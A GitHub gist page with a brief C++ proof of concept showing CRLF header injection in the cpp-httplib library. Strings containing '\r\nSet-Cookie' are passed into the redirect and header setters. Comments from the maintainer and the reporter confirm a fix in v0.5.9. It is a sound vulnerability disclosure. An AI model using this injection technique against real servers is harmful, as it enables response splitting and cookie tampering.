Skip to content

Instantly share code, notes, and snippets.

@shouc

shouc/httplib_poc.cc

Created April 12, 2020 00:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save shouc/a9330df817128bc4c4132abf3de09495 to your computer and use it in GitHub Desktop.
Save shouc/a9330df817128bc4c4132abf3de09495 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
httplib_poc.cc
#include "cpp-httplib/httplib.h"
using namespace httplib;
int main() {
Server svr;
svr.Get("/1", [](const Request& req, Response& res) {
res.set_redirect("1\r\nSet-Cookie: a=1");
});
svr.Get("/2", [](const Request& req, Response& res) {
res.set_header("a", "1\r\nSet-Cookie: a=1");
});
svr.listen("localhost", 3000);
}
@yhirose
Copy link

yhirose commented Apr 14, 2020

@shouc, thanks for the report. I have fixed it with the latest v0.5.9. Could you report the fix to the place to which you have submitted this issue as a vulnerability? Thanks a lot!

@shouc
Copy link
Author

shouc commented Apr 14, 2020

You don't need to. It assumes this is fixed in a version > v0.5.8. Thanks.

@yhirose
Copy link

yhirose commented Apr 14, 2020

OK. Thanks for the info.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment